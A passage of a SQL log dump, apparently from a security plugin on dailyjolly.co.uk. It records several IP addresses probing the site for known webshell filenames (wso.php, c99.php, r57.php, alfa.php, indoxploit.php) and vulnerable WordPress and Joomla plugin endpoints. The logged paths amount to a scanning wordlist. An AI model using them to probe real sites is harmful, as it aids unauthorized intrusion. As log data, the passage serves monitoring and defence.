),('196.74.207.174',3293237166,'',0,1674729548.5711,55,'UyYPKMTVJ0heAuD6GifZOlkQ','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729551.1087,55,'1OBxLjnE5Hdf7tY2VJbCRzrw','','19|0|0|0|www.dailyjolly.co.uk/098.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729553.2152,55,'bR730JivdfMcFEqmTCXH4oKQ','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729555.3138,55,'ApuSUXZkNLHV8behsC3d49qM','','19|0|0|0|www.dailyjolly.co.uk/new_license.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729556.2258,55,'IRAijcqbfQWs051FwhEpG8LZ','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729559.3342,55,'UgQiMVNdBF7oSXhsyfDKHjpa','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729562.1232,55,'0JzsAl92657UXuv8WSIVnNfm','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729563.4847,55,'8cOzJa03ewSMA4fK2DvplHmx','','19|0|0|0|www.dailyjolly.co.uk/modules/modules/modules.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729564.6630,55,'XpnVq3yj98PwCTJegSDOxGbu','','19|0|0|0|www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729566.0491,55,'8IaTEDR5PeqlmyKZMjJgfhos','','19|0|0|0|www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729567.7606,55,'1XscmAKo50lnFaJwUWebZxpB','','19|0|0|0|www.dailyjolly.co.uk/libraries/joomla/css.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729570.1929,100,'DTJqnS7O5xPjA9koLVGmvR8s','','13|0|0|0|www.dailyjolly.co.uk/libraries/joomla/jmails.php',0,13,0),('196.74.207.174',3293237166,'',0,1674729572.2346,100,'lj8rR3GhEXOPudmgMv7QJTBN','','13|0|0|0|www.dailyjolly.co.uk/libraries/joomla/jmail.php',0,13,0),('196.74.207.174',3293237166,'',0,1674729573.5637,55,'lmDAsVy3a5v4e0TK1QwLgkcM','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729576.2797,55,'HMpawu9VSFbGcrA6Txn2XRDW','','19|0|0|0|www.dailyjolly.co.uk/tmp/vuln.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729577.5686,55,'TDsivN8yCFQPGVB2cJqmUHEa','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729579.8294,55,'vmguTCQjxfpRa9UzFY1hwykB','','19|0|0|0|www.dailyjolly.co.uk/Marvins.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729581.1930,100,'AmlDgcb49wixt0eoR6OK3dsT','','13|0|0|0|www.dailyjolly.co.uk/rxr.php',0,13,0),('196.74.207.174',3293237166,'',0,1674729582.5859,55,'fozgw159n4EjuUs6FHpaSZMY','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729583.9128,55,'C1FDB3bT6zIHngaNfVeOYs2v','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729584.9966,55,'t8ITYFdZ0CNzhKDP6X2lL39M','','19|0|0|0|www.dailyjolly.co.uk/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729586.4669,55,'aGlvrN2b7VXIhxYmpgUzq0yE','','19|0|0|0|www.dailyjolly.co.uk/RxR.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729588.8196,55,'e0klhKqtpWH1gimAxTD2wLvj','','19|0|0|0|www.dailyjolly.co.uk/components/com_b2jcontact/izoc.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729591.0481,55,'SC0OdUs7vGVwylzanfugLZMq','','19|0|0|0|www.dailyjolly.co.uk/V3.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729592.0343,55,'VR56XWqE7oh21B0Csi3QeZxP','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729596.7174,55,'djtMYHzTEyiBVRr1FxQDXfb3','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729598.6548,55,'5bS3Mr9mv8DFXRKOLqo2plVw','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729600.8411,55,'sRQnw7fALB5gvr806yJtNioD','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729602.3267,55,'uhjYPEXIfN4eTsHtKBgM3Vvo','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/bluestork/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729604.7870,55,'VTQNiGDpUrZRl3kHt05KuXIY','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/bluestork/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729607.5390,55,'1Qd5zkqjm8OZD64Epglrh2v9','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/hathor/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729609.8270,55,'uaI3obQlC7iGecEvrkJzns95','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/hathor/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729611.8210,55,'SO2gE4VNl7x1TdsXDRKrW6Zi','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/isis/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729613.2770,55,'QIoZj9sS8YuXNzac5eyq6VCD','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/isis/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729614.6688,55,'IU46r3P5VOpRXbusynQtJ9hZ','','19|0|0|0|www.dailyjolly.co.uk/templates/beez/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729615.9377,55,'WMsQpJvVfOTZnFjG3DmqkreS','','19|0|0|0|www.dailyjolly.co.uk/templates/ja_purity/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729617.2855,55,'Aaj0KXplnYR3L7ehNVZk1s4W','','19|0|0|0|www.dailyjolly.co.uk/templates/rhuk_milkyway/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729618.9820,55,'eZm0UoO5YlwRaVkiStADJQLx','','19|0|0|0|www.dailyjolly.co.uk/templates/system/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729620.2011,55,'9Gbvm4sM12OYZTc0xHVfPz7W','','19|0|0|0|www.dailyjolly.co.uk/templates/system/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729621.6319,55,'BbduHqX7zhga04eYrkGl1nUP','','19|0|0|0|www.dailyjolly.co.uk/templates/beez3/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729623.1965,55,'kamBXGPHQVjbFL26pv0Mhir9','','19|0|0|0|www.dailyjolly.co.uk/templates/beez3/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729624.0297,55,'A6V5SC39KxEzG4yqkYhps7IP','','19|0|0|0|www.dailyjolly.co.uk/templates/beez5/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729626.6587,55,'tKE1f4BgFoIeG076McvVxHUs','','19|0|0|0|www.dailyjolly.co.uk/templates/beez5/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729628.7303,55,'wx1dBICN4eaVLSfcP8KGHFjh','','19|0|0|0|www.dailyjolly.co.uk/templates/beez_20/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729641.1666,55,'weUF0sQubPk94Cy7oJ6RYrqc','','19|0|0|0|www.dailyjolly.co.uk/templates/beez_20/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729643.6695,55,'JOSYKL9B6nNVhrwmyodCXWGI','','19|0|0|0|www.dailyjolly.co.uk/templates/protostar/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729644.7423,55,'hTR01rinmCBPQsNlFEHVKJxX','','19|0|0|0|www.dailyjolly.co.uk/templates/protostar/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729646.7538,55,'MzHUnf7h5bGDN2gy4FL3Q6ZV','','19|0|0|0|www.dailyjolly.co.uk/templates/atomic/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729647.5980,55,'HJ9jvkMFhontxUEO4lbiB5c6','','19|0|0|0|www.dailyjolly.co.uk/templates/atomic/error.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729648.6122,55,'AtyHKnp13lTqoMZOIuk6iDEz','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729650.4485,55,'EyYxUiW1JVRzcwT4XQlHaPj3','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729651.8409,55,'BfTniHs6IbZKkAlM9gPOoh2E','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729653.4919,55,'fktBhopqvD4xi5SFKA2PT7aj','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729686.5082,55,'HFkGSuMjpsDowQrCg3UERIZ8','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729688.6068,55,'HDt9SRpAKXTWmfqbxjBnYhMo','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729691.4199,55,'QBaSdOhCuy1ATVs7xI8Lflw0','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('109.248.175.137',1845014409,'',0,1674736288.5654,55,'klgX2vTw8MCn0IdrR9x5FBmh','','19|0|0|0|www.dailyjolly.co.uk/ss.php',0,19,0),('147.78.47.230',2471374822,'',0,1674749394.4333,55,'3KOM7jazJQhHlsykCuwF0oYN','','19|0|0|0|dailyjolly.co.uk/wp-reset.php',0,19,0),('109.248.175.137',1845014409,'',0,1674753054.3931,55,'8zQsHZ3MgXSIOAiveKhCLWot','','19|0|0|0|www.dailyjolly.co.uk/v33.php',0,19,0),('158.69.23.79',2655328079,'',0,1674754345.6930,55,'MairWUIeGzX4tjlRLS5d3mwg','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-cache/index.php',0,19,0),('158.69.23.79',2655328079,'',0,1674754347.5963,55,'oist9TFjCI6M4krhueYEgzSO','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/handline/handline.php',0,19,0),('158.69.23.79',2655328079,'',0,1674754348.8976,55,'OETHGxX0jVKC143PcZk9wgrt','','19|0|0|0|dailyjolly.co.uk/wp-node.php',0,19,0),('158.69.23.79',2655328079,'',0,1674754350.1780,55,'ZsfxeP8TGRN0C1YXo7k3Fzr6','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/core-builder/index.php',0,19,0),('158.69.23.79',2655328079,'',0,1674754351.2840,55,'VKOmMfRQduWGo30xJcZl68A5','','19|0|0|0|dailyjolly.co.uk/wp/wp-content/plugins/core-builder/index.php',0,19,0),('158.69.23.79',2655328079,'',0,1674754351.3306,10,'VKOmMfRQduWGo30xJcZl68A5','','707|0|0|0|dailyjolly.co.uk/wp/wp-content/plugins/core-builder/index.php',0,707,0),('158.69.23.79',2655328079,'',0,1674754353.2478,55,'7iJAxLnYUgpVk2W14DCdtvZ0','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-content/plugins/core-builder/index.php',0,19,0),('158.69.23.79',2655328079,'',0,1674754354.0544,55,'7Gpo53efmUzCJwO4E6XvDTxu','','19|0|0|0|dailyjolly.co.uk/blog/wp-content/plugins/core-builder/index.php',0,19,0),('185.192.70.50',3116385842,'',0,1674771305.5295,55,'QCz0xNDp9grvPFRZbA16o7X8','','19|0|0|0|dailyjolly.co.uk/wp-admin/imagescheckflush.php',0,19,0),('158.69.23.79',2655328079,'',0,1674773112.3134,55,'KUTvafM3Cmdi8LFIPtDOscXe','','19|0|0|0|dailyjolly.co.uk/wp-content/languages/plugins/plugins.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796741.6674,100,'7AOnsPzJkyxmUT5M9dZe12Lr','','23|0|0|0|www.dailyjolly.co.uk/',0,23,0),('185.65.134.167',3108079271,'',0,1674796741.8004,10,'7AOnsPzJkyxmUT5M9dZe12Lr','','709|0|0|0|www.dailyjolly.co.uk/',0,709,0),('185.65.134.167',3108079271,'',0,1674796741.9961,18,'S7a6CAQPtEGup2BNJbXlvjLh','','13|0|0|0|www.dailyjolly.co.uk/',0,13,0),('185.65.134.167',3108079271,'',0,1674796742.2567,18,'HAqg4wDTSfJYhazNCZ0kQ6mr','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-payeezy-pay/donate.php',0,13,0),('185.65.134.167',3108079271,'',0,1674796742.6713,70,'HaPzsFRNL4YoqQfiDc9dWCrv','','13|0|0|0|www.dailyjolly.co.uk/',0,13,0),('185.65.134.167',3108079271,'',0,1674796742.8994,18,'MhAkremzvbluaLGCRNIxtwX7','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,13,0),('185.65.134.167',3108079271,'',0,1674796743.0650,55,'rOKPwVi5s4EzoBjGa7mQfkRu','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796743.2547,18,'vz8cR4l6HNwqBjmbrAITDFnZ','','13|0|0|0|www.dailyjolly.co.uk/',0,13,0),('185.65.134.167',3108079271,'',0,1674796743.4089,100,'4al1CSWIDoZVcdQUBp3yr9nM','','13|0|0|0|www.dailyjolly.co.uk/',0,13,0),('185.65.134.167',3108079271,'',0,1674796743.4307,100,'yjGXLmUV7CtwKZQN5JxTEkF3','','13|0|0|0|www.dailyjolly.co.uk/my-account/',0,13,0),('185.65.134.167',3108079271,'',0,1674796743.5737,55,'nRd9eMA6bGfcqhUS3HB0w5Ps','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/workreap-temp/2KtbH41NdK35oD7yH7dzvi3sQYo.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796743.5919,18,'ugJI28PO7rFLv6UeqnYxiAHw','','13|0|0|0|www.dailyjolly.co.uk/',0,13,0),('185.65.134.167',3108079271,'',0,1674796743.9530,18,'kjN5wtRodDgMWaC4SfXnI2Yh','','13|0|0|0|www.dailyjolly.co.uk/',0,13,0),('185.65.134.167',3108079271,'',0,1674796744.0649,100,'tasOSfubmyHvGiUzY64MFlwj','','13|0|0|0|www.dailyjolly.co.uk/index.php',0,13,0),('185.65.134.167',3108079271,'',0,1674796744.2142,18,'UEFYc0I5uT1bLfxdtkSXCy7Z','','13|0|0|0|www.dailyjolly.co.uk/wp-json/am-member/license',0,13,0),('185.65.134.167',3108079271,'',0,1674796744.3510,55,'dE354CORDSjlrAZm78whHnBM','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796744.9095,55,'WqlkHtEzDafOSNK82Yhg7reV','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2KtbF4Ysr50wOqn2zJ1Of8T097F.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796745.0109,100,'ytbAuzS4hZlxrjPmFe0EHkWM','','13|0|0|0|www.dailyjolly.co.uk/index.php/video',0,13,0),('185.65.134.167',3108079271,'',0,1674796745.5752,55,'GZC7X8EVlBk0ewK6LnhAxRv5','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/kaswara/fonts_icon/vakbpn/mf.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796745.6051,55,'XS4qdGmxlKAgb9Ir3VUEsP6n','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/imagements/images/2ktbhq0nxcmapyelyw55cpzuj5d.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796746.2085,18,'o4G0xT2KBZzvCuadOELJDhU1','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/simple-file-list/ee-file-engine.php',0,13,0),('185.65.134.167',3108079271,'',0,1674796746.5346,55,'EndCgLylAXbMKGRmhcNu5V4Y','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/html2wp/2KtbHLCLRenXe3AkjR2wu3F452s.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796746.5347,55,'v4AZU9ECn5pWHhBz8iTFqjkG','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/simple-file-list/nuclei.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796746.8774,100,'FG9Dm1xCJunfqTcgekAdP8bi','','13|0|0|0|www.dailyjolly.co.uk/',0,13,0),('185.65.134.167',3108079271,'',0,1674796747.6740,100,'X2tx9noKAduTGLNRHUWs3jaF','','13|0|0|0|www.dailyjolly.co.uk/',0,13,0),('185.65.134.167',3108079271,'',0,1674796747.7060,18,'zhngsXcQJk5AoEam7bwd1UVP','','13|0|0|0|www.dailyjolly.co.uk/wp-json/visualizer/v1/upload-data',0,13,0),('185.65.134.167',3108079271,'',0,1674796747.8426,55,'lL8VQ9rfgvxG0XJekphN1bzd','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/2KtbGdRgtvBP9PSQn71Wjgmm3J2.php',0,19,0),('185.65.134.167',3108079271,'',0,1674796748.0771,100,'FHJqXozsfj4wyu0gpPYEdCl5','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/barcode.php',0,13,0),('185.65.134.167',3108079271,'',0,1674796748.6789,18,'UzYEj0XiHCOl5IkL2Wdsfu1h','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/2KtbGdRgtvBP9PSQn71Wjgmm3J2.php',0,13,0),('20.125.141.130',343772546,'',0,1674797374.7930,55,'6aGQT0uqbFeCOlwdLvS2BpWo','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('20.125.141.130',343772546,'',0,1674797406.8457,55,'0XMIf4a3wKGrUWcxyYNjFLB5','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('20.125.141.130',343772546,'',0,1674797473.1819,55,'a5fg7qNt28bnAMTm4PKwzGYH','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugin/mar.php',0,19,0),('20.125.141.130',343772546,'',0,1674797505.7896,55,'UVIJSZmMsa50G8dqbjvRe3k4','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugin/db.php',0,19,0),('20.125.141.130',343772546,'',0,1674797513.6562,55,'2EQNcnMdWyh06wzUuHDIfX8a','','19|0|0|0|www.dailyjolly.co.uk/installer.php',0,19,0),('20.125.141.130',343772546,'',0,1674797513.8124,10,'2EQNcnMdWyh06wzUuHDIfX8a','','707|0|0|0|www.dailyjolly.co.uk/installer.php',0,707,0),('20.125.141.130',343772546,'',0,1674797748.4804,55,'QjhU4SP8aAyOzp7oZkR9gWcu','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/priv8.php',0,19,0),('20.125.141.130',343772546,'',0,1674797751.1811,55,'97JurdcG4SjtebRILYTmzHA5','','19|0|0|0|www.dailyjolly.co.uk/4price.php',0,19,0),('20.125.141.130',343772546,'',0,1674797759.4027,55,'AJe0CTIPRfraSsxWDlpwoiLE','','19|0|0|0|www.dailyjolly.co.uk/wp-content/rss.php',0,19,0),('20.125.141.130',343772546,'',0,1674797761.0580,55,'2KzOw6MpnfbTHSAy4o1u5JI9','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fx.php',0,19,0),('20.125.141.130',343772546,'',0,1674797762.3455,55,'oLh8pkHyacw7r5Jb0l4jEtA6','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('20.125.141.130',343772546,'',0,1674797763.9438,55,'e8ftsLoIvpOAkBDg6RPalGVF','','19|0|0|0|www.dailyjolly.co.uk/1h6j5.php',0,19,0),('20.125.141.130',343772546,'',0,1674797765.3595,55,'iG5wDx9yVaOHcEq4Bjm82oMJ','','19|0|0|0|www.dailyjolly.co.uk/WSO.php',0,19,0),('20.125.141.130',343772546,'',0,1674797766.7849,55,'DC6zBXvSro0JLixeEhfm2YVp','','19|0|0|0|www.dailyjolly.co.uk/wp-22.php',0,19,0),('20.125.141.130',343772546,'',0,1674797769.4833,55,'QZfOpnlSK8ihzt7ucBJsTv3e','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/wp-pridmag/init.php',0,19,0),('20.125.141.130',343772546,'',0,1674797771.2840,55,'9GivolPqMZk7mygfF05rVctW','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('20.125.141.130',343772546,'',0,1674797772.9945,55,'M7CIhTsmNkFrvO1H6SxW9LlP','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('20.125.141.130',343772546,'',0,1674797774.1294,55,'QUJAKFfNzsoBE2jbvY67VqMx','','19|0|0|0|www.dailyjolly.co.uk/idx.php',0,19,0),('20.125.141.130',343772546,'',0,1674797775.5431,55,'y697lxCATYGLjIRZNh1qwV4J','','19|0|0|0|www.dailyjolly.co.uk/evil.php',0,19,0),('20.125.141.130',343772546,'',0,1674797778.8532,55,'j16QrpcK5UuL2PO4v3fkE8Ya','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('20.125.141.130',343772546,'',0,1674797780.3665,55,'s25q1JDAX9QpS4vwdIHPgoCm','','19|0|0|0|www.dailyjolly.co.uk/bypass.php',0,19,0),('20.125.141.130',343772546,'',0,1674797785.4428,55,'l1aSh9tIYQonbjU3KLys82Wi','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('20.125.141.130',343772546,'',0,1674797786.7521,55,'ugh30JMjBSrpTGL1zIqFd6cv','','19|0|0|0|www.dailyjolly.co.uk/Priv8.php',0,19,0),('20.125.141.130',343772546,'',0,1674797789.8483,55,'Mm72F9NWHrdGnKAkzsbejSZC','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('20.125.141.130',343772546,'',0,1674797791.4596,55,'NUxZMgmGcprkwdz1tB3KDRTJ','','19|0|0|0|www.dailyjolly.co.uk/Priv.php',0,19,0),('20.125.141.130',343772546,'',0,1674797792.7730,55,'VH2poQU346EmRLdhY5gsBfxJ','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('20.125.141.130',343772546,'',0,1674797796.9108,55,'3PZ6Q5KRAEJgDGsHCLk9W4uj','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('20.125.141.130',343772546,'',0,1674797799.1656,55,'qOzels5vEfowiVDFG8BtxdCb','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('20.125.141.130',343772546,'',0,1674797800.5424,55,'nv45jBTRgue6zHMUZdpNAWwL','','19|0|0|0|www.dailyjolly.co.uk/wp-text/themes/seotheme/mar.php',0,19,0),('20.125.141.130',343772546,'',0,1674797805.1121,55,'EvbC5BHWDhI4kGusOlmy1czg','','19|0|0|0|www.dailyjolly.co.uk/wp-text/themes/seotheme/shx.php',0,19,0),('20.125.141.130',343772546,'',0,1674797806.4451,55,'PSnfKLQOj8sExN1IBFml7ikU','','19|0|0|0|www.dailyjolly.co.uk/r57.php',0,19,0),('20.125.141.130',343772546,'',0,1674797808.1760,55,'bUQnEew8WTA90m5Y2N7Ou6Fr','','19|0|0|0|www.dailyjolly.co.uk/c100.php',0,19,0),('20.125.141.130',343772546,'',0,1674797810.3059,55,'0QfjW4EdL17GFhoqwPcaiYSN','','19|0|0|0|www.dailyjolly.co.uk/sniper.php',0,19,0),('20.125.141.130',343772546,'',0,1674797811.6449,55,'QgJqx5EprXaMlonkewRObL76','','19|0|0|0|www.dailyjolly.co.uk/sym.php',0,19,0),('20.125.141.130',343772546,'',0,1674797813.1071,55,'dLHrPGn964CwivK2SyYAlNeo','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('20.125.141.130',343772546,'',0,1674797814.6715,55,'bmKyAOWVuLP3oxCazHTBgrt2','','19|0|0|0|www.dailyjolly.co.uk/s.php',0,19,0),('20.125.141.130',343772546,'',0,1674797816.3278,55,'njOC3FTE18tNXK05PgmzkSUM','','19|0|0|0|www.dailyjolly.co.uk/1975.php',0,19,0),('20.125.141.130',343772546,'',0,1674797819.7437,55,'dUWirZp4hc5HzM7DbYxOIy2v','','19|0|0|0|www.dailyjolly.co.uk/wp-2019.php',0,19,0),('20.125.141.130',343772546,'',0,1674797821.2325,55,'MmwOx1GW23RokIXTNJpqbEdr','','19|0|0|0|www.dailyjolly.co.uk/h4xor.php',0,19,0),('20.125.141.130',343772546,'',0,1674797822.1493,55,'Sn9cNQLmY7R64xJFw10MiAfp','','19|0|0|0|www.dailyjolly.co.uk/wso24.php',0,19,0),('20.125.141.130',343772546,'',0,1674797823.2997,55,'kmbrs2F8gMzqTVe0jSlvZQxU','','19|0|0|0|www.dailyjolly.co.uk/n.php',0,19,0),('20.125.141.130',343772546,'',0,1674797824.3915,55,'pnFHV4sjfZe72tCTqciYIJWD','','19|0|0|0|www.dailyjolly.co.uk/ae.php',0,19,0),('20.125.141.130',343772546,'',0,1674797825.8116,55,'Nyw2h4xeafDcouA6mvGPKlbT','','19|0|0|0|www.dailyjolly.co.uk/2index.php',0,19,0),('20.125.141.130',343772546,'',0,1674797827.2501,55,'BVWTXuzU2YblPA7MEN8swoZh','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('20.125.141.130',343772546,'',0,1674797828.3680,55,'5E8vGQSbZwhRocfq96102ueB','','19|0|0|0|www.dailyjolly.co.uk/radio.php',0,19,0),('20.125.141.130',343772546,'',0,1674797831.3782,55,'5e8hItUKgbyjvNzl4ZmwnLq1','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('20.125.141.130',343772546,'',0,1674797833.4529,55,'gDnH5plV9ZiwkNoYhaPUq7fr','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.125.141.130',343772546,'',0,1674797835.8550,55,'2JjIYGxN5egvsmDpWlfK08ki','','19|0|0|0|www.dailyjolly.co.uk/cpanel.php',0,19,0),('20.125.141.130',343772546,'',0,1674797837.1166,55,'K8IxghsopALdyNGDYwMbj140','','19|0|0|0|www.dailyjolly.co.uk/wp-text/fr.php',0,19,0),('20.125.141.130',343772546,'',0,1674797838.6759,55,'tWmU2HrCaKyi6Q3F8MwTAvXq','','19|0|0|0|www.dailyjolly.co.uk/hello.php',0,19,0),('20.125.141.130',343772546,'',0,1674797840.5212,55,'4z1Mrmoi8D2XvEUycfPwWtkR','','19|0|0|0|www.dailyjolly.co.uk/mm.php',0,19,0),('20.125.141.130',343772546,'',0,1674797841.4494,55,'e7kHFMvIS23bs8wVjAh4fEDG','','19|0|0|0|www.dailyjolly.co.uk/blok.php',0,19,0),('20.125.141.130',343772546,'',0,1674797842.8361,55,'Fta8er5kZPBsq4DGOLuVo0gM','','19|0|0|0|www.dailyjolly.co.uk/images/1.php',0,19,0),('20.125.141.130',343772546,'',0,1674797844.1250,55,'NFJWilG6XxdmtYho47Q9Kkyw','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/user/include.php',0,19,0),('20.125.141.130',343772546,'',0,1674797845.1539,55,'xE8h6p0SAb9WZPqnDMRNzXgT','','19|0|0|0|www.dailyjolly.co.uk/wp-text/languages/plugins/0byte.php',0,19,0),('20.125.141.130',343772546,'',0,1674797846.5751,55,'m0RXwhM65OePv9AZDWzoxU4p','','19|0|0|0|www.dailyjolly.co.uk/modules/logo_img.php',0,19,0),('20.125.141.130',343772546,'',0,1674797847.5690,55,'UwF0kmsNJVBv65W2IxO19Rah','','19|0|0|0|www.dailyjolly.co.uk/shells.php',0,19,0),('20.125.141.130',343772546,'',0,1674797848.5109,55,'blx7SLT0YzgPfyF3GMD2KHQu','','19|0|0|0|www.dailyjolly.co.uk/z.php',0,19,0),('20.125.141.130',343772546,'',0,1674797849.6910,55,'Ccq8hgjLIeuz71pP2xFy4GUv','','19|0|0|0|www.dailyjolly.co.uk/oc.php',0,19,0),('20.125.141.130',343772546,'',0,1674797851.0580,55,'yepJbumD67nifWRkZK94BA8U','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('20.125.141.130',343772546,'',0,1674797852.0922,55,'TkXrIQNJ0SdpjVKzv8U1otGW','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('20.125.141.130',343772546,'',0,1674797853.2694,55,'lzvSgxrKbEd37ZhIJ1ApjMHP','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('20.125.141.130',343772546,'',0,1674797857.0346,55,'zdcmi8lxP7kRHtXfWjQw0rA4','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('20.125.141.130',343772546,'',0,1674797861.0821,55,'EhKM5BYo4vcJFqCt2fDeuTj7','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('20.125.141.130',343772546,